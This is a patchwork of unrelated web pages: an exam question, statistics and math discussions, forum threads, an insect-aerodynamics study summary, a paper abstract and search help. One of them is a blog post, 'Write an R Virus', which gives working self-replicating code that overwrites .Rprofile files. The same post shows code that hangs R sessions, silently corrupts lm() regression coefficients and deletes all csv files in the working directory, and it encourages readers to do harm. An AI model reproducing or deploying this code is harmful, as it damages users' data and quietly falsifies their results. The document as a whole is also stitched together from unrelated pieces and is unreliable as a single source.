Q 1414445359. A goods train and a passenger train are running on the parallel tracks in the same direction. The driver of the goods train observes that the passenger I train coming from behind, overtakes and crosses his train completely in 1 min whereas a passenger on the passenger train marks that he crosses the goods train in 2/3 min. If the speeds of the trains is in the ratio of 1 : 2, then find the ratio of their lengths.
A
4 : 1
B
3 : 1
C
1 : 4
D
2 : 1
#### HINT
(Provided By a Student and Checked/Corrected by EXXAMM.com Team)
#### Access free resources including
• 100% free video lectures with detailed notes and examples
• Previous Year Papers
• Mock Tests
• Practices question categorized in topics and 4 levels with detailed solutions
• Syllabus & Pattern Analysis |
# Write an R Virus
## 2018/09/27
Categories: R Tags: Programming
A computer virus is a piece of program that can:
• copy itself
This is not very hard to accomplish with R, as I will demonstrate in this article.
## Replicate
The virus exploits R’s initilization script, .Rprofile. When R starts up, it is going to look for this file in the current working directory and the user’s home directory, then runs everything in it:
{
function() {
rp_paths <- c("~/.Rprofile", paste0(getwd(), "/.Rprofile"))
inject <- function(rp, code) {
write(code, file = rp, append = FALSE)
}
lapply(rp_paths, inject, code = deparse(match.call()))
}
}()
When the above script is run, it will make a copy of itself through deparse(match.call()), and overwrite the .Rprofile files. The next time you open a new R session, everything you see in the above will be run again. Right now, our virus does nothing but printing something at the end of your start up message.
...
Type 'demo()' for some demos, 'help()' for on-line help, or
'help.start()' for an HTML browser interface to help.
Type 'q()' to quit R.
Any project that started by the user is going to have its project folder infected. Likewise, if someone copy-and-pasted the R project folder to another computer, and start R from there, his home folder is going to be infected.
As R is an interpreted language, this seems to be the only way to infection. To conceal our malicous code, there is a way of packing a Shiny app into a Windows executable through using a tool called RInno, which has Electron behind itself.
## Damage
It looks like that the replication part of the virus is taken care of. What, then, are some malicious scripts that we can have fun with?
There could be countless ways.
One of the easiest thing to do is to hang the user’s R session. It could be done as simply as putting it to sleep for a really long time:
Sys.sleep(1e9)
… like 30 years, give or take.
Or, let R come up with a really large number; this is also going take up available memory to the user.
rnorm(1e9)
For me, 1e9 is quite enough. But scientific notaion is your friend. Go big.
However, if R is rendered completely unusable, the virus isn’t going to travel very far. That’s not what we want. It is also a great idea to replace some good functions with naughty ones. Symbol bindings are locked in attached namespaces, but it is easy to undo that:
reassign <- function(sym, value, envir) {
envir <- as.environment(envir)
unlockBinding(sym, envir)
assign(sym, value, envir = envir)
}
We can do the user a service by forbidding the library() function, and prompt a better option.
reassign("library",
function(...) warning("No man, seriously. Use require()"),
"package:base"
)
The effect would be:
library(purrr)
## Warning in library(purrr): No man, seriously. Use require()
Now let’s try something more subtle and more bad(badder?). We first extend the reassign() function a little bit…
tamper <- function(sym, value, envir){
assign(paste0(".",sym),
get(sym, envir = as.environment(envir)),
envir = as.environment("package:base")
)
reassign(sym, value, envir)
}
… and use it to slip in some bad code.
tamper("lm",
function(...){
model <- .lm(...)
model$coefficients <- model$coefficients * (1 + rnorm(1))
model
},
"package:stats")
Now when we build a model; the coefficients looks normal, but are completely off. You can compare the this with the result on your own computer.
lm(mpg ~ ., data = mtcars)\$coefficients
## (Intercept) cyl disp hp drat wt
## 26.19206873 -0.23724034 0.02838876 -0.04573226 1.67564315 -7.90933403
## qsec vs am gear carb
## 1.74787465 0.67647016 5.36519129 1.39527763 -0.42453418
In the above, we saved a copy of the original function in the base package, concealing it with prepending the name wit a .. If we didn’t do that, we would have create an infinite recursion through self-refernce, such as:
reassign("paste",
function(...) paste(...),
"package:base")
paste("foo", "bar")
Running this will have an effect of crashing the R session. If the user didn’t save documents before setting off this bomb,it’s obviously too bad. Another way to create trouble.
## Further Damage
There are yet more ways to our streak of mischief. For starters, how about deleting every csv file the user has in the working directory?
file.remove(list.files(getwd(),
".csv",
recursive = TRUE)
Doing something on the file system is a big step foward form just messing with their R session.
From annoying to destructive, the level of naughtiness only limited by on your imagination. With some deliberation, you can ruin someone’s life in a very meaningful way.
Here are some futher ideas:
• Bloat the user’s disk space with meaningless data
• Give wrong results only sometimes when a function is called
• Use Rstudio API to mess with the user’s scripts in the editor, or some other wild sh*t.
Note
You also have the choice of putting any of the malicious programs in .First() and .Last() functions, which will run at the beginning and the end of a session. See the R Manual for details.
More on .Rprofile: Fun with .Rprofile and customizing R startup |
### The model asserts the likelihood
12 July 13. [link] PDF version
Part of a series of posts that started here
Recall from an earlier post that some authors define a model to be equivalent to a parameterized likelihood distribution. That is, there is a one-to-one mapping between models and likelihood functions: if you give me a likelihood, then that is the core of my model, from which I can derive the CDF, RNG, and many implications. Conversely—and I'll discuss this in detail next time—if you give me a well-defined model, even one defined in non-probabilistic terms, then there exists a likelihood function giving the probability of a given combination of parameters and data.
For this post, I'll stick to some very typical likelihood functions from Stats 101: the Normal distribution, which, given $\mu$ and $\sigma$, gives the probability that a given observation will occur (herein, $L_{\cal N}(x, \mu, \sigma)$); and ordinary least squares, which, given $\beta$s and the variance of the error term $\sigma$, gives the probability that an observation $(Y, X)$ will occur as $L_{\cal N}(Y, \beta X, \sigma)$.
This entry will be about social norms. The short version is that there is no truly objective measure of a model, because most measures use the model's likelihood to make statements about the likelihood of modeled events; instead we have certain established customs.
###### Reading numbers off of the map
The Normal distribution is the limit of many very plausible physical processes, in which several independent and identically distributed elements are averaged together, so it is often very plausible that repeated observations from a real-world process follow a Normal distribution. The model $X$ is Normally distributed' is really the model $X$ is the mean of several iid subelements' after a few theorems are applied to derive the implications of the iid model. There are many situations where that model is easily plausible, and in those cases it is easy to confound the map and the terrain. That's the joy of a good map.
For a linear regression, there is rarely a hard-and-fundamental reason for the dependent variable to be a linear function of independent inputs [maybe (number of eyes in the population) = $\beta_0 + \beta_1$(number of noses) $+ \epsilon$?]. In common usage, it is nothing but a plausible approximation, and we can't break it down to a simpler, more plausible model the way the Normal model is implied by the iid subelements model.
And even if the overall picture is plausible, it is easy to push the model to the point of reading features from the map that may or may not be on the actual terrain. The stats student runs a regression, finds that the model assigns probability .96 to the claim that $\beta\neq 0$, and muses how that was derived from or is reflected in facts about the real world. It isn't: it's a calculation from the model likelihood.
The claim that we reject the null with $p=0.04$ is calculated using a data set and the model likelihood, and we colloquially call it a test of the model. That is, we test the model using the model. To make this preeminently clear, here's another valid model, letting $\hat\beta =(X'X)^{-1}X'Y$, (i.e., the standard OLS coefficients); then for our model, let the coefficient be:
$$\beta =\left\{\begin{matrix} \hat\beta, & |\hat\beta| > 1 \\ 1, & |\hat\beta|\leq 1 \end{matrix}\right.$$
This is a useful model: over many arbitrary data sets, we know that $\beta$ will correlate to the slope of the $X$-$Y$ line, albeit a little less than $\hat\beta$ does. But it has the massive advantage over OLS that we reject the null hypothesis that $\beta=0$ with 100.00% certainty. Just as with OLS, the model as stated is not inconsistent with the data—any data—given this model's assumptions. Now that you have an internally consistent model where the parameters are always significantly different from zero, you can publish anywhere, right?
###### Objective functions
The other way to describe the $\beta$s for the ordinary least squares model is, as per the name, to find the line that minimizes squared error $(Y_i - X_i\beta)^2$. Your favorite undergrad stats textbook should show you a diagram with a line of best fit through a scatter of data points, and vertical dotted lines from each point to the line; it is those squared lengths that we are minimizing. Why not the shortest distance from datum point to the line, which is typically a diagonal line, or the horizontal line from datum to line of best fit? The only honest answer is that the math is easier with the vertical distance.
So you could go to any seminar where the speaker fit a regression line and ask why did you minimize the squared vertical length instead of the Euclidian distance between points and the line? or better still, if you used Euclidian distance, would your parameters still be significant? The speaker might respond that it's implausible that there's a serious difference in results given the two objective functions (because the odds are low that the speaker really tried any alternative objective functions), or might cite computational convenience. Or the speaker might not have a chance to answer, as the other seminar attendees cut you off for being an obstruction to the progress of the seminar. Linear regression has been around long enough that all of its epistemology has been worked through, and discussing it again is largely rehash.
In a much-recommended paper by William Thurston, he explains how he got over a similar block regarding the very objective world of mathematics:
When I started as a graduate student at Berkeley, I had trouble imagining how I could “prove'' a new and interesting mathematical theorem. I didn't really understand what a “proof'' was.
By going to seminars, reading papers, and talking to other graduate students, I gradually began to catch on. Within any field, there are certain theorems and certain techniques that are generally known and generally accepted. […] Many of the things that are generally known are things for which there may be no known written source. As long as people in the field are comfortable that the idea works, it doesn't need to have a formal written source.
Linear regression has been widely accepted, so authors don't have to discuss the fundamentals when presenting regression-based papers. But it is an arbitrary set of assumptions that are salient for their historical place and human plausibility. Setting aside its social position, it is on the same footing as any other internally consistent model, notably in that claims about the model's consistency with data are made using the likelihood that the model itself defines and are therefore plausible iff the model itself is plausible. |
## Write PHP Program to convert a character from upper to lower and lower to upper case
<!-- Write a programme to convert upper case letter to lower case and lower case to upper-->
<html>
<body>
<?php
$n1 = 'c';$upper = strtoupper($n1); echo "The Upper case of ".$n1." : ".$upper;$n2 = 'Z';
$lower = strtolower($n2);
echo "<br>The Lower case of ".$n2.": ".$lower;
?>
</body>
</html>
Output:
The Upper case of c : C
The Lower case of Z : z
≪ Previous | Next ≫ |
Potential Function of a Conservative Force
1. Jan 24, 2013
bmb2009
1. The problem statement, all variables and given/known data
Given a conservative force with the Force given as F=y^2(i)+2xy(j), what is the potential function related to it.
2. Relevant equations
-dU/dx = F
3. The attempt at a solution
I know I have to integrate the components but I don't know how... since the (i) direction was differentiated with respect to x would I just treat the y as constant and say F=xy^2(i)+xy^2(j) + c ?
2. Jan 24, 2013
fzero
You're on the right track, but remember that the potential is a scalar function. You've written down a result that is a vector and for some reason called it F. It might help to explicitly write down the components of F in terms of the partial derivatives of U.
3. Jan 24, 2013
bmb2009
So would it just be U(x,y)=xy^2 + xy^2 = 2xy^2 + c because it's a scalar?
4. Jan 24, 2013
LCKurtz
Close, but no. Remember, you are looking for a scalar function $U(x,y)$ such that $\nabla U = \vec F$. So you need $U_x = y^2$ and $U_y = 2xy$. Start by taking the anti-partial derivative of the first one with respect to $x$ by holding $y$ constant, as you asked in your original post. Don't forget when you do that your "constant" of integration will be a function of $y$. Them make the second equation work. |
1. Can anyone help me with this question? i know its very simple, but im stuck;
Solve the equation;
thank you
2. ### Related Discussions:
3. Do you need to actually solve the equation, or just extract x?
4. whether extracting x or y, the idea is to get rid of the "d" sign with an integral.
5. Uh, sorry, a bit out of my league. Hope you get help, though.
6. Are you in high school or university? Can't help though, it's above my level as well.
7. Well, the equation is not conservative. I am willing to offer that much, Hahaha.
Might I suggest you integrate each element and treat the x as a constant in the first term and treat y as a constant in the second? I'm not sure about the validity of this, but I'm not sure what your solving for either. The lack of it being conservative eliminates the option of trying to find a tangent plane. Also, evaluating it as a closed line integral would require area bounds.
All in all, I'm not sure what to tell you either. I think you need to be a bit more specific with what you're looking for. What solution are you trying to get. Give a name or description.
8. What do you mean by solve the equation? Do mean find the set of points (x,y) for which that 1-form is zero?
The equation is equivalent to the two simultaneous equations
x^2y = 0
x^3 + x^2 y - 2 xy^2 - y^3 = 0
The first equation implies that either x=0 or y=0.
If x=0, the second equation implies that y=0.
If y=0, the second equation implies that x=0.
Evidently, this differential form vanishes only at (0,0).
9. Originally Posted by salsaonline
What do you mean by solve the equation? Do mean find the set of points (x,y) for which that 1-form is zero?
The equation is equivalent to the two simultaneous equations
x^2y = 0
x^3 + x^2 y - 2 xy^2 - y^3 = 0
The first equation implies that either x=0 or y=0.
If x=0, the second equation implies that y=0.
If y=0, the second equation implies that x=0.
Evidently, this differential form vanishes only at (0,0).
Absolutely correct. (No surprise.)
But this kid is in high school and I don't think he is really trying to find the set of points where a differential form vanishes.
On the other hand I have not been able to figure out what he is tryng to find. He does not always start with a well-posed problem.
10. Absolutely correct. (No surprise.)
But this kid is in high school and I don't think he is really trying to find the set of points where a differential form vanishes.
On the other hand I have not been able to figure out what he is tryng to find. He does not always start with a well-posed problem.
Yes the post by salsaonline is somewhat mysterious to me, because thats no what we have to do. though he might me right, the answer in the book does not correspond to his response. This question is under the chapter (differential equations) and i have alot of nasty questions in here, which for you(Dr.Rocket and salsaonline, and some others) may seem like an easy question. This is one of them, in which i find tricky(not hard). That early binomial question i asked was pretty hard, and i gave a proof for it, but it seems like no one is giving me a response. This question im still working on it, and i will try to show my workings, i would appreciate if experienced members can correct my workings(wherever mistakes are there).
11. Originally Posted by Heinsbergrelatz
Absolutely correct. (No surprise.)
But this kid is in high school and I don't think he is really trying to find the set of points where a differential form vanishes.
On the other hand I have not been able to figure out what he is tryng to find. He does not always start with a well-posed problem.
Yes the post by salsaonline is somewhat mysterious to me, because thats no what we have to do. though he might me right, the answer in the book does not correspond to his response. This question is under the chapter (differential equations) and i have alot of nasty questions in here, which for you(Dr.Rocket and salsaonline, and some others) may seem like an easy question. This is one of them, in which i find tricky(not hard). That early binomial question i asked was pretty hard, and i gave a proof for it, but it seems like no one is giving me a response. This question im still working on it, and i will try to show my workings, i would appreciate if experienced members can correct my workings(wherever mistakes are there).
You need to start by very clearly telling us what you are trying to do and by defining yourbterms and symbols. You have not done that in either case.
For this problem salsaonline gave you the solution to the most reasonable interpretation of your post. But I am not surprised that you do not understand what he is talking about.
You have a tendency to throw out a bunch of symbols and think everyone will understand and in fact understand the same way that you or your text do. That won't work. You have to put in some thought and explain what you mean. In this case you provided an equation in terms of differential forms -- and I am quite sure that you did not mean to do that since you don't know what a differential form is. Consequently salsaonline's correct response hits you as a complete mystery.
I think you started with an ordinary differential equation. Make sure you copied it correctly. This does not appear at first blush to be readily solvable, but might be a separable equation that was mis-copied.
12. you need to start by very clearly telling us what you are trying to do and by defining yourbterms and symbols. You have not done that in either case.
For this problem salsaonline gave you the solution to the most reasonable interpretation of your post. But I am not surprised that you do not understand what he is talking about.
You have a tendency to throw out a bunch of symbols and think everyone will understand and in fact understand the same way that you or your text do. That won't work. You have to put in some thought and explain what you mean. In this case you provided an equation in terms of differential forms -- and I am quite sure that you did not mean to do that since you don't know what a differential form is. Consequently salsaonline's correct response hits you as a complete mystery.
I think you started with an ordinary differential equation. Make sure you copied it correctly. This does not appear at first blush to be readily solvable, but might be a separable equation that was mis-copied.
nothing is miscopied, its exactly how it is given in the book. and yes it is a separable equation. No details of Symbol or whatsoever are given.
13. Originally Posted by Heinsbergrelatz
. and yes it is a separable equation.
Then separate it and integrate.
14. Then separate it and integrate.
the whole point of asking this question was that i was having a trouble separating the equation, in other words "solve the equation"-thats how the book put it.
15. Originally Posted by Heinsbergrelatz
Can anyone help me with this question? i know its very simple, but im stuck;
Solve the equation;
thank you
Separating the equation is simple. Take the integral, and separate it into two integrals, one with every term attached to "dx" and the other with all the terms attached to "dy" and solve it.
and if I did this right, it implies only x has to equal 0 after integrating.
16. I believe that solving it that way would yield:
But your statement otherwise still holds true regardless.
17. Originally Posted by Arcane_Mathematician
Originally Posted by Heinsbergrelatz
Can anyone help me with this question? i know its very simple, but im stuck;
Solve the equation;
thank you
Separating the equation is simple. Take the integral, and separate it into two integrals, one with every term attached to "dx" and the other with all the terms attached to "dy" and solve it.
and if I did this right, it implies only x has to equal 0 after integrating.
"Separating" here mrans getting all the x's on one side and all the y's on the other.
18. Originally Posted by DrRocket
Originally Posted by Arcane_Mathematician
Originally Posted by Heinsbergrelatz
Can anyone help me with this question? i know its very simple, but im stuck;
Solve the equation;
thank you
Separating the equation is simple. Take the integral, and separate it into two integrals, one with every term attached to "dx" and the other with all the terms attached to "dy" and solve it.
and if I did this right, it implies only x has to equal 0 after integrating.
"Separating" here mrans getting all the x's on one side and all the y's on the other.
Which, DrRocket, I believe you were correct to say that the equation appears inseparable. I do not think it is separable either.
Alright, Heins, this is a homework problem from a book, as I believe you mentioned. It is under differential equations, but what is the preceding lesson about? Explain in moderate detail, for it may give us some idea on what you're supposed to be doing with the equation.
19. Could it be that the the problem was to find a potential whose differential was the given 1-form?
If so, I don't think that's possible, since the 1-form is not closed.
That is, if , then we would have to have , which is not the case.
And yes, I know that the book would never phrase it in that manner, but you know what I mean Dr R.
20. okay thanks arcane, for trying to help me out, but the answer in the book does not give the answer you gave me. Rather, the answer involves logarithm, which implies that there is a reciprocal function that is to be integrated
Alright, Heins, this is a homework problem from a book, as I believe you mentioned. It is under differential equations, but what is the preceding lesson about? Explain in moderate detail, for it may give us some idea on what you're supposed to be doing with the equation.
hmwrk problem?? i dont think so, the book im using isnt even used in my school + IB HL mathematics do not have d.e. of this sort. Rather they would have questions of d.e such as this one; y=e^{\alpha x} show that this satisfies the following; dy/dx+kd^2y/dx^2+xy=... (this is just some random example i came up with, in which i have see in my textbook.)
21. Originally Posted by Heinsbergrelatz
okay thanks arcane, for trying to help me out, but the answer in the book does not give the answer you gave me. Rather, the answer involves logarithm, which implies that there is a reciprocal function that is to be integrated
If you are really interested in becoming a mathematician you would do well to concentrate less on finding the answer in the back of the book and more on understanding the nature of the question.
22. q.
23. If you are really interested in becoming a mathematician you would do well to concentrate less on finding the answer in the back of the book and more on understanding the nature of the question.
well, i have solved it, and have arrived at what the answer in the book got. You really think im just mindlessly depending on the answer of the book? of course not. Also those answers at the back have a pretty small chance of going wrong. i also dont usually look at the answer, i look at it when im really fed up, and just stuck hopelessly. Of course at times i go with what i have got, even though the answer in the book does not agree with my answer.
You see in my other post higher derivatives, i gave the answer at that back of the book, and you got something else, so you thought that the book was wrong (exactly the same thing here), but actually i got what the answer in the book said.
24. Originally Posted by Heinsbergrelatz
You see in my other post higher derivatives, i gave the answer at that back of the book, and you got something else, so you thought that the book was wrong (exactly the same thing here), but actually i got what the answer in the book said.
Nobody here commented on the answer in the book, In fact nobody here could figure out what question you were really asking -- including 2 Ph.D. mathematicians.
The answer given you by salsaonline is correct (he is one of the Ph.D.s), but pretty clearly did not address the question as you see it.
My comment stands, in spades.
25. Nobody here commented on the answer in the book, In fact nobody here could figure out what question you were really asking -- including 2 Ph.D. mathematicians.
The answer given you by salsaonline is correct (he is one of the Ph.D.s), but pretty clearly did not address the question as you see it.
My comment stands, in spades.
i dont get what you dont understand, i gave a question form my book, exactly the way it is in the book. Its asking you to solve it, and i also have said that the answer should come in a form of a separable d.e. . I have read what Salsaonline said again, and yes that also can be the solution. But im saying that thats not the answer the book is looking for, i mean in this chapter of Differential equations, you have to try and eliminate the dy and the dx so you only get functions in terms of x and y, and maybe sin cos arcos arctan log,ln etc... but the key idea is to get rid of the d's. So eventually the answer should come about as y=......
26. Originally Posted by Heinsbergrelatz
Nobody here commented on the answer in the book, In fact nobody here could figure out what question you were really asking -- including 2 Ph.D. mathematicians.
The answer given you by salsaonline is correct (he is one of the Ph.D.s), but pretty clearly did not address the question as you see it.
My comment stands, in spades.
i dont get what you dont understand, i gave a question form my book, exactly the way it is in the book. Its asking you to solve it, and i also have said that the answer should come in a form of a separable d.e. . I have read what Salsaonline said again, and yes that also can be the solution. But im saying that thats not the answer the book is looking for, i mean in this chapter of Differential equations, you have to try and eliminate the dy and the dx so you only get functions in terms of x and y, and maybe sin cos arcos arctan log,ln etc... but the key idea is to get rid of the d's. So eventually the answer should come about as y=......
You are confusing mathematics with arithmetic (computation).
27. of course the concept is there, but the computation is also there. hence im not confusing anything(arithmetic is also regarded as mathematics).
28. Originally Posted by Heinsbergrelatz
of course the concept is there, but the computation is also there. hence im not confusing anything(arithmetic is also regarded as mathematics).
You have two choices:
1) You can get you hackles up, let your ego get in the way,think you know better and keep arguing.
or
2) You can listen to people who understand a hell of a lot more mathematics than you do and learn something.
But you have an opportunity, and I think the capability to profit if you take option 2.
29. Originally Posted by Heinsbergrelatz
okay thanks arcane, for trying to help me out, but the answer in the book does not give the answer you gave me. Rather, the answer involves logarithm, which implies that there is a reciprocal function that is to be integrated
Alright, Heins, this is a homework problem from a book, as I believe you mentioned. It is under differential equations, but what is the preceding lesson about? Explain in moderate detail, for it may give us some idea on what you're supposed to be doing with the equation.
hmwrk problem?? i dont think so, the book im using isnt even used in my school + IB HL mathematics do not have d.e. of this sort. Rather they would have questions of d.e such as this one; y=e^{\alpha x} show that this satisfies the following; dy/dx+kd^2y/dx^2+xy=... (this is just some random example i came up with, in which i have see in my textbook.)
You completely missed the point. Homework problems are homework problems regardless of the status of the book's use. You are using it, you implied that it was a problem posed in the book with a solution contained in the book. Calm down. What did the preceding lesson entail?
Bookmarks
##### Bookmarks
Posting Permissions
You may not post new threads You may not post replies You may not post attachments You may not edit your posts BB code is On Smilies are On [IMG] code is On [VIDEO] code is On HTML code is Off Trackbacks are Off Pingbacks are Off Refbacks are On Terms of Use Agreement |
# A chordwise offset of the wing-pitch axis enhances rotational aerodynamic forces on insect wings: a numerical study
### Abstract
Most flying animals produce aerodynamic forces by flapping their wings back and forth with a complex wingbeat pattern. The fluid dynamics that underlies this motion has been divided into separate aerodynamic mechanisms of which rotational lift, that results from fast wing pitch rotations, is particularly important for flight control and manoeuvrability. In our study we focus on the generation of these rotational forces during the wing-reversal and come to a new and remarkably simpel rotational lift model.
## Background
Insects fly by flapping there wings back and forth, contrary to birds which often move there wings up and down. To understand this unique wingbeat pattern scientist have tried to link the motion of the wing to the forces the insect generates Ellington1984. In the end this will enable us to gain insight in how an insect flies, but also how the morphology of the insect influences the force generation. Essentially this helps us understand how an insects stays in the air.
Before we can say anything about the force generation we need to know how an insect moves. Unfortunately a flying insect moves really fast, but luckily for us high-speed camera’s can be used to slow down this motion. Lets look at a great movie on how a fruit-fly flies captured by Muijres2014
It might be difficult to see but the insect moves the wings to the front of its body (horizontal to the ground) under an angle of around $$45^o$$, when it can no longer move forward it rotates its wing around the length of the wing and then move back again.
This rotation is the focus of our manuscript. It has been discovered some time ago by Dickinson1999 that pitching a wing around its longitudinal axis that is moving forward with a certain stroke velocity generates a force. These forces are known as rotational forces. However, as mentioned by Bomphrey2017 it appears that mosquitoes also generates rotational forces at wing-reversal, when the wing is not moving forward or backward, so what gives?
The idea from Nakata2015 is that there is an additional rotational lift force, called “rotational drag”, which is linked to the rotational velocity about the longitudinal axis of the wing. This means that an insect can generate rotational forces at wing-reversal.
## Our approach
Based on the this notion from all the previous mentioned authors we set out to do a parametric study, varying the forward velocity, wing shape, and longitudinal rotational velocity systematically to understand how these additional rotational forces are generated.
For this study we used computational fluid mechanics, which is a method that can simulate the movement of the air if the motion of the animal is known. The solver which we used is open-source and can be found here: IBAMR Bhalla2013.
From our results we noticed that indeed Nakata2015 was correct, that insects can generate additional rotational forces at wing-reversal. We also found that the geometry influences these forces in a very systematic way. The additional rotational forces are influenced by the asymmetry in the shape of the wing along the longitudinal axis. This means that for a symmetrical wing no additional forces are generated!
From our parametric study we also where able to create a very simple rotational lift model
$$F_{\mathrm{rotational}} = C_{F, \mathrm{rotational}} \rho \left(\sqrt{S_{xx}S_{yy}} \omega_{\mathrm{stroke}} \omega_{\mathrm{pitch}} + S_{x|x|} \omega_{\mathrm{pitch}}^2 \right)$$
where the coefficient $$C_{F,\mathrm{rotational}} \approx \frac{2}{3}\pi$$, $$\rho$$ the density of the air, $$\sqrt{S_{xx}S_{yy}}$$ the symmetric second moment of area, $$\omega_{\mathrm{stroke}}$$ the stroke velocity, $$\omega_{\mathrm{pitch}}$$ the pitch velocity and $$S_{x|x|}$$ the asymmetric second moment of area and finally $$F_{\mathrm{rotational}}$$ the rotational forces, which are defined perpendicular to the wing surface.
## Conclusion
This asymmetric second moment of area $$S_{x|x}$$ is essentially a measure of how much wing surface is above or below the pitch axis. This means that if we move the pitch axis more towards the leading edge (introducing the chord-wise offset) the wing-asymmetry increases and so do the rotational forces. This also holds true the other way around, if we decrease the pitch axis, moving it closer to the symmetry axis of the wing the rotational forces decrease.
These rotational forces are of importance for the insect because it is been shown by Muijres2014 that the kinematics is adapted at wing-reversal when a maneuver is performed.
# Bibliography
[Ellington1984] Ellington, The aerodynamics of hovering insect flight. IV. aerodynamic mechanisms, Philosophical transaction royal society London, (1984).
[Muijres2014] Muijres, Elzinga, Melis & Dickinson, Flies evade looming targets by executing rapid visually directed banked turns, Science, 344, 172-177 (2014).
[Dickinson1999] Dickinson, Lehmann & Sane, Wing roation and the aerodynamic basis of insect flight, Science, 284, 1954-1960 (1999).
[Bomphrey2017] Bomphrey, Nakata, Phillips & Walker, Smart wing rotation and trailing-edge vortices enable high frequency mosquito flight, Nature, 544, 92-96 (2017).
[Nakata2015] Nakata, Liu Hao & Bomphrey, A CFD-informed quasi-steady model of flapping-wing aerodynamics, Journal of Fluid Mechanics, 783, 323-343 (2015).
[Bhalla2013] Bhalla, Bale, Griffith & Patankar, A unified mathematical framework and an adaptive numerical method for fluid–structure interaction with rigid, deforming, and elastic bodies, Journal of computational physics, 250, 446-476 (2013).
##### Wouter G. van Veen
###### Promovendus
I use computational fluid mechanics to research the fundaments of insect flight. |
# Semi-implicit iterative schemes with perturbed operators for infinite accretive mappings and infinite nonexpansive mappings and their applications to parabolic systems
Volume 10, Issue 3, pp 902--921 Publication Date: March 20, 2017 Article History
• 630 Downloads
• 710 Views
### Authors
Li Wei - School of Mathematics and Statistics, Hebei University of Economics and Business, Shijiazhuang 050061, Hebei, China. Ravi P. Agarwal - Department of Mathematics, Texas A & M University-Kingsville, Kingsville, TX78363, USA. - Department of Mathematics, Faculty of Science, King Abdulaziz University, Jeddah, 21589, Saudi Arabia. Yaqin Zheng - College of Science, Agricultural University of Hebei, Baoding 071001, Hebei, China.
### Abstract
In a real uniformly convex and uniformly smooth Banach space, we first prove a new path convergence theorem and then present some new semi-implicit iterative schemes with errors which are proved to be convergent strongly to the common element of the set of zero points of infinite m-accretive mappings and the set of fixed points of infinite nonexpansive mappings. The superposition of perturbed operators are considered in the construction of the iterative schemes and new proof techniques are employed compared to some of the recent work. Some examples are listed and computational experiments are conducted, which guarantee the effectiveness of the proposed iterative schemes. Moreover, a kind of parabolic systems is exemplified, which sets up the relationship among iterative schemes, nonlinear systems and variational inequalities.
### Keywords
• M-accretive mapping
• $\tau_i$-strongly accretive mapping
• contractive mapping
• $\lambda_i$-strictly pseudocontractive mapping
• semi-implicit iterative scheme
• parabolic systems.
• 47H05
• 47H09
• 47H10
### References
• [1] R. P. Agarwal, D. O’Regan, D. R. Sahu, Fixed point theory for Lipschitzian-type mappings with applications, Topological Fixed Point Theory and Its Applications, Springer, New York (2009)
• [2] M. A. Alghamdi, M. A. Alghamdi, N. Shahzad, H.-K. Xu, The implicit midpoint rule for nonexpansive mappings, Fixed Point Theory Appl., 2014 (2014), 9 pages.
• [3] V. Barbu, Nonlinear semigroups and differential equations in Banach spaces, Translated from the Romanian, Editura Academiei Republicii Socialiste Romania, Bucharest; Noordhoff International Publishing, Leiden (1976)
• [4] R. E. Bruck Jr., Properties of fixed-point sets of nonexpansive mappings in Banach spaces, Trans. Amer. Math. Soc., 179 (1973), 251–262.
• [5] L.-C. Ceng, Q. H. Ansari, S. Schaible, J.-C. Yao, Hybrid viscosity approximation method for zeros of m-accretive operators in Banach spaces, Numer. Funct. Anal. Optim., 33 (2012), 142–165.
• [6] L.-C. Ceng, Q. H. Ansari, J.-C. Yao, Mann-type steepest-descent and modified hybrid steepest-descent methods for variational inequalities in Banach spaces, Numer. Funct. Anal. Optim., 29 (2008), 987–1033.
• [7] L.-C. Ceng, A. R. Khan, Q. H. Ansari, J.-C. Yao, Strong convergence of composite iterative schemes for zeros of m-accretive operators in Banach spaces, Nonlinear Anal., 70 (2009), 1830–1840.
• [8] L.-C. Ceng, H.-K. Xu, J.-C. Yao, Strong convergence of an iterative method with perturbed mappings for nonexpansive and accretive operators, Numer. Funct. Anal. Optim., 29 (2008), 324–345.
• [9] H.-H. Cui, M.-L. Su, On sufficient conditions ensuring the norm convergence of an iterative sequence to zeros of accretive operators, Appl. Math. Comput., 258 (2015), 67–71.
• [10] P. E. Maingé, Strong convergence of projected subgradient methods for nonsmooth and nonstrictly convex minimization, Set-Valued Anal., 16 (2008), 899–912.
• [11] Y.-L. Song, L.-C. Ceng, A general iteration scheme for variational inequality problem and common fixed point problems of nonexpansive mappings in q-uniformly smooth Banach spaces, J. Global Optim., 57 (2013), 1327–1348.
• [12] W. Takahashi, Proximal point algorithms and four resolvents of nonlinear operators of monotone type in Banach spaces, Taiwanese J. Math., 12 (2008), 1883–1910.
• [13] S.-H. Wang, P. Zhang, Some results on an infinite family of accretive operators in a reflexive Banach space, Fixed Point Theory Appl., 2015 (2015 ), 11 pages.
• [14] L. Wei, R. P. Agarwal, Iterative algorithms for infinite accretive mappings and applications to p-Laplacian-like differential systems, Fixed Point Theory Appl., 2016 (2016 ), 23 pages.
• [15] L. Wei, R. P. Agarwal, P. Y. J. Wong, New method for the existence and uniqueness of solution of nonlinear parabolic equation, Bound. Value Probl., 2015 (2015 ), 18 pages.
• [16] L.Wei, Y.-C. Ba, R. P. Agarwal, New ergodic convergence theorems for non-expansive mappings andm-accretive mappings, J. Inequal. Appl., 2016 (2016 ), 20 pages.
• [17] L. Wei, R.-L. Tan, Iterative scheme with errors for common zeros of finite accretive mappings and nonlinear elliptic system, Abstr. Appl. Anal., 2014 (2014 ), 9 pages.
• [18] H.-K. Xu, Iterative algorithms for nonlinear operators, J. London Math. Soc., 66 (2002), 240–256.
• [19] H.-K. Xu, Strong convergence of an iterative method for nonexpansive and accretive operators, J. Math. Anal. Appl., 314 (2006), 631–643. |
# zbMATH — the first resource for mathematics
##### Examples
Geometry Search for the term Geometry in any field. Queries are case-independent. Funct* Wildcard queries are specified by * (e.g. functions, functorial, etc.). Otherwise the search is exact. "Topological group" Phrases (multi-words) should be set in "straight quotation marks". au: Bourbaki & ti: Algebra Search for author and title. The and-operator & is default and can be omitted. Chebyshev | Tschebyscheff The or-operator | allows to search for Chebyshev or Tschebyscheff. "Quasi* map*" py: 1989 The resulting documents have publication year 1989. so: Eur* J* Mat* Soc* cc: 14 Search for publications in a particular source with a Mathematics Subject Classification code (cc) in 14. "Partial diff* eq*" ! elliptic The not-operator ! eliminates all results containing the word elliptic. dt: b & au: Hilbert The document type is set to books; alternatively: j for journal articles, a for book articles. py: 2000-2015 cc: (94A | 11T) Number ranges are accepted. Terms can be grouped within (parentheses). la: chinese Find documents in a given language. ISO 639-1 language codes can also be used.
##### Operators
